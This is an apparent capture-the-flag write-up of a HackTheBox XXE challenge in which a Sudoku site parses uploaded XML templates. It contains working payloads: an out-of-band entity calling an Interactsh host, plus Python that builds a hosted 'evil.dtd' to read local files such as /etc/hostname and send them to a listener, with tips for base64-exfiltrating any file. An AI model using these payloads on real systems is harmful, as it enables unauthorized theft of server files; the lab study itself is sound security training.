Thanks for taking the time to read this write-up.
- HackTheBox Academy has a module within the Penetration Tester Job Role Pathway that addresses XXE. I had a good understanding of what needed to be done, but this challenge really helped me refine my understanding. Good challenge here!
They gave us a Sudoku board that allows us to upload custom XML templates.

The XML template looks like this:

The web application requires that each row contain a single integer between 0 and 9, and the template must be a valid Sudoku answer key.
The first column in the template has the number 5. Since the validator only cares about the value it ends up with, we can test for classic XXE by declaring a general entity whose replacement text is 5 and referencing that entity in the first column instead of the literal digit, like this:

The game accepts the upload as a valid Sudoku solution, which means the parser substituted the entity before validating the board: entity expansion works, so XXE is the way to go.
The template is very restrictive, though. After some testing it became painfully apparent that the only value the first column would accept was 5 (it is a Sudoku answer key), so there is no field in which the contents of an entity could be reflected back to us.
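The probe described above, as an added example that is not part of the write-up: an internal general entity whose replacement text is the expected answer-key digit, plus the check a substituting parser implicitly performs when it hands the expanded value to the game's validator. The board/row/cell element names are assumed, since the challenge's template is not reproduced here.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for the answer key: the value the validator expects in
# the first cell of the first row (the write-up says it is 5).
EXPECTED_FIRST_CELL = "5"


def build_probe(first_cell: str = EXPECTED_FIRST_CELL) -> str:
    """Template whose first cell is supplied by an internal general entity.

    The element names (board/row/cell) are assumed, not the challenge's own.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE board [\n"
        f'<!ENTITY xxe "{first_cell}">\n'
        "]>\n"
        "<board><row><cell>&xxe;</cell><cell>3</cell></row></board>\n"
    )


def first_cell_after_parse(xml_text: str) -> str:
    """The value an entity-substituting parser hands to the game's validator."""
    root = ET.fromstring(xml_text)
    return root.find("./row/cell").text or ""


def entities_are_expanded(xml_text: str, expected: str = EXPECTED_FIRST_CELL) -> bool:
    """True if the entity reference resolved to the expected answer-key value.

    This is exactly what 'the upload was accepted' tells us about the target:
    the parser performs DTD entity substitution, the precondition for XXE.
    """
    try:
        return first_cell_after_parse(xml_text) == expected
    except ET.ParseError:
        return False


if __name__ == "__main__":
    probe = build_probe()
    print(probe)
    print("first cell after parsing:", first_cell_after_parse(probe))
    print("parser substitutes entities:", entities_are_expanded(probe))
```

Any replacement text other than the answer-key digit fails the board check (`build_probe("7")` is rejected), which is why the first column cannot be used to read a file back: the only thing it ever tells us is whether substitution happened.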
Next step: out-of-band (OOB) testing.
- I set up an Interactsh (interactsh.com) listener.
- I then tested whether I could make the web application call out to that listener.
- Because nothing is reflected, a general entity would give us no output to read. Parameter entities, which are declared and referenced with a % prefix, are expanded inside the DTD itself, so a SYSTEM parameter entity makes the parser fetch its URL as a side effect of parsing, with no reflection required.
- The file on the left was uploaded (its XML is reproduced below), and the request showed up on my listener.

XML from the image above:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test123 [
<!ENTITY % xxe SYSTEM "https://gojvoiqamwyerrovnllfckaflb7rqheas.oast.fun">
%xxe;
]>
The next step was to attempt to extract some data: declare a second parameter entity containing the contents of a local file, and have the parser append those contents as a GET parameter of the callback URL. That second declaration has to live in a DTD hosted on a server we control, because the XML specification does not allow a parameter-entity reference inside a markup declaration in the internal subset.
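The attacker side of that exfiltration, as an added example rather than the author's tooling: the hosted DTD that chains the parameter entities, the upload that loads it, and a small listener that both serves the DTD and records whatever the target's parser appends to the callback. The listener address, the target file (/etc/hostname) and the `<board/>` root element are assumptions; the `&#x25;` escape for the nested `%` and the use of an external DTD are the standard requirements for this chain.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_external_dtd(listener_base: str, target_file: str) -> str:
    """DTD hosted on the attacker's server (evil.dtd).

    %file  makes the target's parser read the local file.
    %eval  declares a nested parameter entity whose SYSTEM id carries %file in
           the query string. The inner '%' is written as &#x25; so the outer
           declaration parses; it becomes a real '%' when %eval; is expanded.
    %exfil referencing the nested entity makes the parser request the callback.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{listener_base}/?d=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_upload_xml(dtd_url: str) -> str:
    """The template to upload: the internal subset pulls in the hosted DTD
    through a parameter entity, so no entity has to appear in any cell."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE test123 [\n"
        f'<!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        "%dtd;\n"
        "]>\n"
        "<board/>\n"  # assumed root element; the real answer-key body goes here
    )


class Listener(BaseHTTPRequestHandler):
    """Serves /evil.dtd and records the 'd' query parameter of any other GET."""

    dtd = ""       # set by the caller before the target is made to fetch it
    received = []  # exfiltrated values, in arrival order

    def do_GET(self):
        url = urllib.parse.urlsplit(self.path)
        if url.path == "/evil.dtd":
            body = self.dtd.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
        else:
            # keep_blank_values so an empty target file is still recorded
            values = urllib.parse.parse_qs(url.query, keep_blank_values=True).get("d")
            if values:
                self.received.append(values[0])
            body = b"ok"
            self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):  # keep stdout quiet
        pass


def start_listener(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Run the listener on a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), Listener)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(url: str) -> str:
    """Plain GET; stands in for the target's XML parser in the demo below."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    server = start_listener()
    base = f"http://{server.server_address[0]}:{server.server_address[1]}"
    Listener.dtd = build_external_dtd(base, "/etc/hostname")
    print(build_upload_xml(f"{base}/evil.dtd"))
    # Stand-in for the victim: fetch the DTD, "read" the file, call back.
    fetch(f"{base}/evil.dtd")
    fetch(f"{base}/?d=" + urllib.parse.quote("victim-host"))
    print("exfiltrated:", Listener.received)
    server.shutdown()
```

Against the real target, host the DTD on a server the application can reach (Interactsh shows that the callback arrived; the DTD itself still has to be served from somewhere you control) and paste the output of build_upload_xml into the template. File contents containing newlines, spaces, '#', '?' or '&' break the callback URL, so start with single-line files such as /etc/hostname; where the target parser is PHP's, the php://filter/convert.base64-encode/resource= wrapper turns any file into URL-safe text.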